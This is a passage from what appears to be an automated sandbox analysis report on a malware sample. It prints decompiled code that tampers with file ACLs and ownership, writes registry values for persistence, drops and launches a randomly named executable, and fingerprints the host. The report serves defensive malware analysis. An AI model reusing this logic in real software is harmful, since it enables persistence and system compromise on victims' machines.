							_t66 = _v16 + 8; // 0xc8685f74
							_t123 =  *_t66;
							if(_t123 != 0) {
								 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
							} else {
								 *((char*)(_v12 + 1)) = 0xb;
							}
							_v24 = 1;
						}
						goto L32;
					}
					while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
						_t153 = _t153 + 1;
						if(_t153 < _t141) {
							continue;
						}
						break;
					}
					if(_t153 >= _t141) {
						goto L19;
					}
					DeleteAce(_v20, _v8);
					_v24 = 1;
					L33:
					_t110 = _v20;
				} while (_v8 < (_t110->AceCount & 0x0000ffff));
				if(_v24 != 0) {
					_v28 = 1;
					_t154 = LocalAlloc(0x40, 0x14);
					if(_t154 != 0) {
						if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0) {
							_t116 = SetFileSecurityA(_a4, 4, _t154); // executed
							if(_t116 != 0) {
								_v28 = 1;
							}
						}
						LocalFree(_t154);
					}
				}
				goto L41;
			}



































                                                                                0x0012781e
                                                                                0x00127826
                                                                                0x00127829
                                                                                0x0012782c
                                                                                0x0012782f
                                                                                0x00127837
                                                                                0x00127a8e
                                                                                0x00127a94
                                                                                0x00127a94
                                                                                0x0012785c
                                                                                0x00127863
                                                                                0x00127866
                                                                                0x0012786e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012787e
                                                                                0x0012788b
                                                                                0x0012789a
                                                                                0x001278a2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001278c3
                                                                                0x001278cc
                                                                                0x001278cf
                                                                                0x001278da
                                                                                0x001278e0
                                                                                0x001278e9
                                                                                0x001278ed
                                                                                0x001278f9
                                                                                0x00127910
                                                                                0x00127910
                                                                                0x00127917
                                                                                0x00127917
                                                                                0x001278ed
                                                                                0x001278da
                                                                                0x00127930
                                                                                0x0012793b
                                                                                0x00127a8d
                                                                                0x00000000
                                                                                0x00127a8d
                                                                                0x00127941
                                                                                0x00127946
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012794c
                                                                                0x00127955
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012795b
                                                                                0x0012795b
                                                                                0x0012796b
                                                                                0x00127a2a
                                                                                0x00127a2a
                                                                                0x00000000
                                                                                0x00127a2a
                                                                                0x00127977
                                                                                0x00127979
                                                                                0x0012797e
                                                                                0x001279ae
                                                                                0x001279b1
                                                                                0x001279b6
                                                                                0x001279bd
                                                                                0x001279bd
                                                                                0x001279c5
                                                                                0x001279cb
                                                                                0x001279d0
                                                                                0x001279e5
                                                                                0x001279d2
                                                                                0x001279d7
                                                                                0x001279de
                                                                                0x001279de
                                                                                0x001279ed
                                                                                0x001279ef
                                                                                0x001279f2
                                                                                0x001279f5
                                                                                0x001279f5
                                                                                0x001279fb
                                                                                0x00127a03
                                                                                0x00127a09
                                                                                0x00127a09
                                                                                0x00127a0e
                                                                                0x00127a24
                                                                                0x00127a10
                                                                                0x00127a13
                                                                                0x00127a13
                                                                                0x00127a27
                                                                                0x00127a27
                                                                                0x00000000
                                                                                0x001279fb
                                                                                0x00127980
                                                                                0x00127994
                                                                                0x00127997
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127997
                                                                                0x0012799b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001279a3
                                                                                0x001279a9
                                                                                0x00127a2d
                                                                                0x00127a2d
                                                                                0x00127a34
                                                                                0x00127a41
                                                                                0x00127a47
                                                                                0x00127a50
                                                                                0x00127a54
                                                                                0x00127a60
                                                                                0x00127a79
                                                                                0x00127a81
                                                                                0x00127a83
                                                                                0x00127a83
                                                                                0x00127a81
                                                                                0x00127a87
                                                                                0x00127a87
                                                                                0x00127a54
                                                                                0x00000000

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 0012782F
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00127866
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00127878
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0012789A
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00127F63,?), ref: 001278B8
                                                                                • EqualSid.ADVAPI32(?,00127F63), ref: 001278D2
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 001278E3
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 001278F1
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00127901
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00127910
                                                                                • LocalFree.KERNEL32(00000000), ref: 00127917
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00127933
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00127963
                                                                                • EqualSid.ADVAPI32(?,00127F63), ref: 0012798A
                                                                                • DeleteAce.ADVAPI32(?,00000000), ref: 001279A3
                                                                                • EqualSid.ADVAPI32(?,00127F63), ref: 001279C5
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00127A4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00127A58
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00127A69
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00127A79
                                                                                • LocalFree.KERNEL32(00000000), ref: 00127A87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: a7fe2938354135bce3524b65adfbb0f1c640760aaf60ccd114aa047031c4647b
                                                                                • Instruction ID: 03207f98bb994f51e8619de29ad9e77bdee47ea6fb729cc6b14e67c348ed2113
                                                                                • Opcode Fuzzy Hash: a7fe2938354135bce3524b65adfbb0f1c640760aaf60ccd114aa047031c4647b
                                                                                • Instruction Fuzzy Hash: 18813B71D04229ABDF22CFA5ED84FEFBBB8AF08354F14416AE505E2190D7359A91CF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00128328 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 791 128328-12833e call 127dd6 794 128340-128343 791->794 795 128348-128356 call 126ec3 791->795 796 12877b-12877d 794->796 799 12846b-128474 795->799 800 12835c-128378 call 1273ff 795->800 801 1285c2-1285ce 799->801 802 12847a-128480 799->802 812 128464-128466 800->812 813 12837e-128384 800->813 804 1285d0-1285da call 12675c 801->804 805 128615-128620 801->805 802->801 806 128486-1284ba call 122544 RegOpenKeyExA 802->806 815 1285df-1285eb 804->815 810 128626-12864c GetTempPathA call 128274 call 12eca5 805->810 811 1286a7-1286b0 call 126ba7 805->811 821 128543-128571 call 122544 RegOpenKeyExA 806->821 822 1284c0-1284db RegQueryValueExA 806->822 852 128671-1286a4 call 122544 call 12ef00 call 12ee2a 810->852 853 12864e-12866f call 12eca5 810->853 831 128762 811->831 832 1286b6-1286bd call 127e2f 811->832 814 128779-12877a 812->814 813->812 819 12838a-12838d 813->819 814->796 815->805 820 1285ed-1285ef 815->820 819->812 825 128393-128399 819->825 820->805 827 1285f1-1285fa 820->827 846 128573-12857b 821->846 847 1285a5-1285b7 call 12ee2a 821->847 829 128521-12852d RegCloseKey 822->829 830 1284dd-1284e1 822->830 826 12839c-1283a1 825->826 826->826 834 1283a3-1283af 826->834 827->805 836 1285fc-12860f call 1224c2 827->836 829->821 835 12852f-128541 call 12eed1 829->835 830->829 838 1284e3-1284e6 830->838 840 128768-12876b 831->840 864 1286c3-12873b call 12ee2a * 2 lstrcpyA lstrlenA call 127fcf CreateProcessA 832->864 865 12875b-12875c DeleteFileA 832->865 842 1283b3-1283ba 834->842 843 1283b1 834->843 835->821 835->847 836->805 836->840 838->829 848 1284e8-1284f6 call 12ebcc 838->848 850 128776-128778 840->850 851 12876d-128775 call 12ec2e 840->851 858 128450-12845f call 12ee2a 842->858 859 1283c0-1283fb call 122544 RegOpenKeyExA 842->859 843->842 861 12857e-128583 846->861 847->801 879 1285b9-1285c1 call 12ec2e 847->879 848->829 878 1284f8-128513 RegQueryValueExA 848->878 850->814 851->850 852->811 853->852 858->801 859->858 883 1283fd-12841c RegQueryValueExA 859->883 861->861 871 128585-12859f RegSetValueExA RegCloseKey 861->871 899 12874f-12875a call 127ee6 call 127ead 864->899 900 12873d-12874d CloseHandle * 2 864->900 865->831 871->847 878->829 884 128515-12851e call 12ec2e 878->884 879->801 888 12841e-128421 883->888 889 12842d-128441 RegSetValueExA 883->889 884->829 888->889 894 128423-128426 888->894 895 128447-12844a RegCloseKey 889->895 894->889 898 128428-12842b 894->898 895->858 898->889 898->895 899->865 900->840
                                                                                C-Code - Quality: 97%
                                                                                			E00128328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00127DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00126EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x132c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x132c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0012EE2A(_t173, 0x1322f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0012EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x132c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x132c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x132c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0012EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x132c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0012EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0012EED1(_v8,  *0x132c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E001273FF(_t173, 0x130264, 0, 0,  &_v388,  &_v60); // executed
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x132159 - 0x60;
						if( *0x132159 < 0x60) {
							L18:
							E0012EE2A(_t180, 0x1322f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x132cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00126BA7(0x132cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x132cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0012EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00127E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x132cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0012EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0012EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x132cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00127FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00127EE6(_t174);
										E00127EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x132cd8);
								_t113 = E00128274(0x132cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0012ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x132cd8; // 0x0
									E0012EF00(_t69, _t117);
									E0012EE2A(_t177, 0x1322f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0012ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x132cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0012675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0); // executed
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x1321a4; // 0x30800
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E001224C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x1322d4 - _t128; // 0x348c26af
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00122544(0x1322f8, 0x130710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12); // executed
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16); // executed
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189); // executed
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}





















































                                                                                0x00128328
                                                                                0x00128328
                                                                                0x00128334
                                                                                0x0012833e
                                                                                0x00000000
                                                                                0x00128342
                                                                                0x0012834a
                                                                                0x00128354
                                                                                0x00128356
                                                                                0x0012846b
                                                                                0x0012846e
                                                                                0x00128474
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012847a
                                                                                0x00128480
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001284a2
                                                                                0x001284ad
                                                                                0x001284b6
                                                                                0x001284b8
                                                                                0x001284ba
                                                                                0x00128543
                                                                                0x0012855f
                                                                                0x00128564
                                                                                0x0012856d
                                                                                0x0012856f
                                                                                0x00128571
                                                                                0x001285a5
                                                                                0x001285ac
                                                                                0x001285b1
                                                                                0x001285b4
                                                                                0x001285b7
                                                                                0x001285bc
                                                                                0x001285c1
                                                                                0x00000000
                                                                                0x001285b7
                                                                                0x00128573
                                                                                0x00128579
                                                                                0x0012857b
                                                                                0x0012857b
                                                                                0x0012857e
                                                                                0x0012857e
                                                                                0x00128580
                                                                                0x00128581
                                                                                0x00128581
                                                                                0x00128587
                                                                                0x00128587
                                                                                0x00128596
                                                                                0x0012859f
                                                                                0x00000000
                                                                                0x0012859f
                                                                                0x001284d3
                                                                                0x001284d9
                                                                                0x001284db
                                                                                0x001284dd
                                                                                0x001284e1
                                                                                0x001284e3
                                                                                0x001284e6
                                                                                0x001284eb
                                                                                0x001284f0
                                                                                0x001284f1
                                                                                0x001284f4
                                                                                0x001284f6
                                                                                0x001284f8
                                                                                0x0012850b
                                                                                0x00128511
                                                                                0x00128513
                                                                                0x00128518
                                                                                0x0012851d
                                                                                0x0012851e
                                                                                0x0012851e
                                                                                0x00128513
                                                                                0x001284f6
                                                                                0x001284e6
                                                                                0x001284e1
                                                                                0x00128524
                                                                                0x0012852a
                                                                                0x0012852d
                                                                                0x00128538
                                                                                0x0012853e
                                                                                0x0012853f
                                                                                0x00128541
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128541
                                                                                0x00000000
                                                                                0x0012835c
                                                                                0x0012836e
                                                                                0x00128373
                                                                                0x00128376
                                                                                0x00128378
                                                                                0x00128464
                                                                                0x00128464
                                                                                0x00128779
                                                                                0x00000000
                                                                                0x0012877a
                                                                                0x0012837e
                                                                                0x00128384
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012838a
                                                                                0x0012838d
                                                                                0x00000000
                                                                                0x00128393
                                                                                0x00128393
                                                                                0x00128399
                                                                                0x0012839c
                                                                                0x0012839c
                                                                                0x0012839e
                                                                                0x0012839f
                                                                                0x0012839f
                                                                                0x001283a5
                                                                                0x001283ac
                                                                                0x001283af
                                                                                0x001283b1
                                                                                0x001283b1
                                                                                0x001283b3
                                                                                0x001283ba
                                                                                0x00128450
                                                                                0x00128457
                                                                                0x0012845c
                                                                                0x001285c2
                                                                                0x001285c2
                                                                                0x001285c5
                                                                                0x001285c8
                                                                                0x001285ce
                                                                                0x00128615
                                                                                0x0012861a
                                                                                0x00128620
                                                                                0x001286a7
                                                                                0x001286a8
                                                                                0x001286ad
                                                                                0x001286ae
                                                                                0x001286b0
                                                                                0x00128762
                                                                                0x00128762
                                                                                0x00128768
                                                                                0x00128768
                                                                                0x0012876b
                                                                                0x00128770
                                                                                0x00128775
                                                                                0x00128778
                                                                                0x00128778
                                                                                0x00000000
                                                                                0x00128778
                                                                                0x001286b6
                                                                                0x001286bb
                                                                                0x001286bd
                                                                                0x0012875b
                                                                                0x0012875c
                                                                                0x00000000
                                                                                0x0012875c
                                                                                0x001286c5
                                                                                0x001286cc
                                                                                0x001286d8
                                                                                0x001286db
                                                                                0x001286eb
                                                                                0x001286f2
                                                                                0x001286ff
                                                                                0x00128705
                                                                                0x0012870d
                                                                                0x00128714
                                                                                0x00128733
                                                                                0x00128739
                                                                                0x0012873b
                                                                                0x0012874f
                                                                                0x00128755
                                                                                0x00000000
                                                                                0x0012875a
                                                                                0x00128746
                                                                                0x0012874b
                                                                                0x00000000
                                                                                0x0012874b
                                                                                0x0012862c
                                                                                0x00128633
                                                                                0x00128638
                                                                                0x00128639
                                                                                0x00128644
                                                                                0x00128647
                                                                                0x0012864a
                                                                                0x0012864c
                                                                                0x00128671
                                                                                0x00128683
                                                                                0x0012868c
                                                                                0x00128693
                                                                                0x0012869f
                                                                                0x001286a4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012864e
                                                                                0x0012864e
                                                                                0x0012864e
                                                                                0x00128657
                                                                                0x0012865d
                                                                                0x00128660
                                                                                0x00128663
                                                                                0x00128666
                                                                                0x0012866c
                                                                                0x0012866c
                                                                                0x00000000
                                                                                0x0012864e
                                                                                0x001285da
                                                                                0x001285df
                                                                                0x001285e2
                                                                                0x001285e5
                                                                                0x001285eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001285ed
                                                                                0x001285ef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001285f4
                                                                                0x001285fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128601
                                                                                0x00128606
                                                                                0x00128609
                                                                                0x0012860f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012860f
                                                                                0x001283c2
                                                                                0x001283df
                                                                                0x001283e2
                                                                                0x001283e5
                                                                                0x001283ea
                                                                                0x001283f3
                                                                                0x001283f9
                                                                                0x001283fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128414
                                                                                0x0012841a
                                                                                0x0012841c
                                                                                0x0012842d
                                                                                0x0012843e
                                                                                0x00128441
                                                                                0x00128447
                                                                                0x0012844a
                                                                                0x00000000
                                                                                0x0012844a
                                                                                0x0012841e
                                                                                0x00128421
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128423
                                                                                0x00128426
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128428
                                                                                0x0012842b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012842b
                                                                                0x0012838d

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 001283F3
                                                                                • RegQueryValueExA.KERNEL32(00130750,?,00000000,?,00128893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00128414
                                                                                • RegSetValueExA.KERNEL32(00130750,?,00000000,00000004,00128893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00128441
                                                                                • RegCloseKey.ADVAPI32(00130750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0012844A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$localcfg
                                                                                • API String ID: 237177642-1194859034
                                                                                • Opcode ID: b0e5f0604cac6de8dac7d58bf5796bbee2f5cb473522455628075873a909bf4e
                                                                                • Instruction ID: 39f2d86f69b825a3a92feb9e312e098b57ed9ac5a81319a4a9461cf3bd3e50f8
                                                                                • Opcode Fuzzy Hash: b0e5f0604cac6de8dac7d58bf5796bbee2f5cb473522455628075873a909bf4e
                                                                                • Instruction Fuzzy Hash: CFC180B1D41269BFEF11ABA4FC85EEE7BBCEB18304F144465F505A2051EB705EA4CB21
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121D96 Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 929 121d96-121dce call 12ee2a GetVersionExA 932 121de0 929->932 933 121dd0-121dde 929->933 934 121de3-121e14 GetSystemInfo GetModuleHandleA GetProcAddress 932->934 933->934 935 121e16-121e21 GetCurrentProcess 934->935 936 121e24-121e59 call 12e819 * 2 934->936 935->936 941 121e7a-121ea0 call 12ea84 call 12e819 call 12199c 936->941 942 121e5b-121e77 call 12df70 * 2 936->942 953 121ea2-121ea6 941->953 954 121ea8 941->954 942->941 955 121eac-121ec1 call 12e819 953->955 954->955 958 121ec3-121ede call 12f04e call 12ea84 955->958 959 121ee0-121ef6 call 12e819 955->959 958->959 964 121f14-121f2b call 12e819 959->964 965 121ef8 call 121b71 959->965 973 121f49-121f65 call 12e819 964->973 974 121f2d call 121bdf 964->974 970 121efd-121f11 call 12ea84 965->970 970->964 980 121f67-121f77 call 12ea84 973->980 981 121f7a-121f8c call 1230b5 973->981 979 121f32-121f46 call 12ea84 974->979 979->973 980->981 988 121f93-121f9a 981->988 989 121f8e-121f91 981->989 991 121fb7 988->991 992 121f9c-121fa3 call 126ec3 988->992 990 121fbb-121fc0 989->990 993 121fc2 990->993 994 121fc9-121fea GetTickCount 990->994 991->990 997 121fa5-121fac 992->997 998 121fae-121fb5 992->998 993->994 997->990 998->990
                                                                                C-Code - Quality: 95%
                                                                                			E00121D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				signed int _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0012EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192); // executed
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0012E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0012E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0012DF70(1, "work_srv");
					E0012DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0012EA84(1, _t104, _t92, 0); // executed
				_t93 = 0;
				_t63 = E0012E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				_t64 = E0012199C(_t63); // executed
				if(_t64 == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0012E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0012F04E(_t93);
					E0012EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0012E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
